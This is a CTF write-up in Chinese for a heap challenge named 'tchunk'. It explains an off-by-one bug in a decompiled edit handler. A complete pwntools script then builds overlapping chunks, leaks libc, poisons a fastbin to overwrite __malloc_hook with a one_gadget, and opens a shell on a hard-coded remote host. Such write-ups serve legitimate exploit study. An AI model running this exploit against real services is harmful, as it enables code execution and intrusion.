tchunk(offbyone+堆块重叠)

题目:

// Decompiler output for the program's "edit" handler: reads a slot index from
// stdin and then overwrites the buffer stored in that slot of a global table
// (40-byte records starting at unk_202060, presumably {ptr, ..., size}).
int sub_F4B()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF  -- user-supplied slot index
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]  -- stack-protector canary copy (fs:0x28)

  v2 = __readfsqword(0x28u);
  puts("Please Input index:");
  _isoc99_scanf("%d", &v1);
  // Only a NULL entry is rejected; v1 itself is never range-checked before
  // being used as a table index (a negative or large value reads outside it).
  if ( !*((_QWORD *)&unk_202060 + 5 * v1) )
    return printf("Error!");
  puts("Change EMo Content");
  // The read length is the record's stored size + 1, so one byte past the end
  // of the allocation can be written: this is the off-by-one the write-up
  // uses to build the overlapping heap chunks. The fix is to drop the "+ 1".
  return read(0, *((void **)&unk_202060 + 5 * v1), (unsigned int)(*((_DWORD *)&unk_20206C + 10 * v1) + 1));
}

思路:
利用offbyone构造堆块重叠->申请4个chunk(0,1,2,3)(最后一个用于隔绝topchunk)->free 0 ->编辑1修改2的prev_size为0和1的和,size的最后一位为0->free2->0,1,2合并->申请0->show 1->libc
->申请2(实际是从1分割出去的)->free 2->编辑1的fd就是修改2的fd为malloc-0x23(fakechunk)->把fakechunk申请回来并添加内容使malloc的值=onegadget->调用malloc->shell
script:

from pwn import *
from LibcSearcher import *
def conn():
    """Open the remote tube and load the challenge libc.

    Binds the module-level names used by the other helpers: ``r`` (the
    pwntools tube) and ``Libc`` (ELF for libc-2.23). The local-process and
    binary lines are intentionally left commented out, as in the original.
    """
    global r, Libc, elf
    host, port = "1.95.36.136", 2093
    #r = process("./tchunk")
    Libc = ELF("./libc-2.23.so")
    r = remote(host, port)
    #elf = ELF("./pwn1")
def add(x, y, z):
    """Menu option 1: allocate slot *x* with size *y* and write *z* into it."""
    dialogue = (
        (b"Choice!\n", b"1"),
        (b"item:\n", str(x).encode()),
        (b"Size:\n", str(y).encode()),
        (b"Emo!:\n", z),
    )
    for prompt, reply in dialogue:
        r.sendlineafter(prompt, reply)
def edit(x, y):
    """Menu option 3: overwrite the content of slot *x* with the bytes *y*."""
    dialogue = (
        (b"Choice!\n", b"3"),
        (b"index:\n", str(x).encode()),
        (b"Content\n", y),
    )
    for prompt, reply in dialogue:
        r.sendlineafter(prompt, reply)
def free(x):
    """Menu option 2: release slot *x*."""
    index = str(x).encode()
    r.sendlineafter(b"Choice!\n", b"2")
    r.sendlineafter(b"index:\n", index)
def show(x):
    """Menu option 4: ask the program to print slot *x*.

    Only sends the request; the caller reads the reply from ``r``.
    """
    dialogue = ((b"Choice!\n", b"4"), (b"index:\n", str(x).encode()))
    for prompt, reply in dialogue:
        r.sendlineafter(prompt, reply)
def pwn():
    """Run the sequence from the 思路 section above against the tube ``r``.

    Each step depends on the heap state left by the previous one, so the
    calls must stay in this exact order. The constants (0x3c4b78, the
    ``one`` list, the 0x23 / 0x13 adjustments) are specific to the
    challenge's libc-2.23 build and are not derived from ``Libc.sym``.
    """
    # Three 0xf8 chunks plus a larger slot 3 that keeps chunk 2 away from
    # the top chunk.
    add(0,0xf8,b'0')
    add(1,0xf8,b'0')
    add(2,0xf8,b'0')
    add(3,0x100,b'0')
    free(0)
    #show(0)
    # The extra byte read by the edit handler (size + 1) reaches chunk 2's
    # header: prev_size becomes 0x200 (chunk 0 + chunk 1) and the low size
    # byte 0x00 clears PREV_INUSE.
    edit(1,b'a'*0xf0+p64(0x100+0x100)+b'\x00')
    # free(2) now consolidates backwards over chunks 1 and 0.
    free(2)
    # Re-take slot 0; slot 1 is still inside the merged free chunk, so
    # show(1) prints the libc pointer it holds.
    add(0,0xf8,b'0')
    show(1)
    # Hard-coded distance from the leaked pointer to libc base (libc-2.23).
    libc = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x3c4b78
    print("libc>>>",hex(libc))
    malloc = libc + Libc.sym["__malloc_hook"]
    # Slot 2 is carved out of the region overlapping slot 1, so once it is
    # freed the edit on slot 1 rewrites chunk 2's fd pointer.
    add(2,0x68,b'aaa')
    free(2)
    edit(1,p64(malloc-0x23))
    add(2,0x68,b'a')
    # Candidate one_gadget offsets for this libc; index 2 is the one used.
    one = [0x4527a,0xf03a4,0xf1247]
    onegadget = libc+one[2]
    print("onegadget>>>",hex(onegadget))
    # Slot 4 is the fake chunk in front of __malloc_hook; 0x13 bytes of
    # padding place onegadget on the hook itself.
    add(4,0x68,b'a'*0x13+p64(onegadget))
    # Menu option 1 allocates again, which invokes the hook.
    r.sendlineafter(b"Choice!\n",b"1")
    #gdb.attach(r)
    r.interactive()
def main():
    """Script entry point: connect first, then drive the interaction."""
    conn()
    pwn()


main()
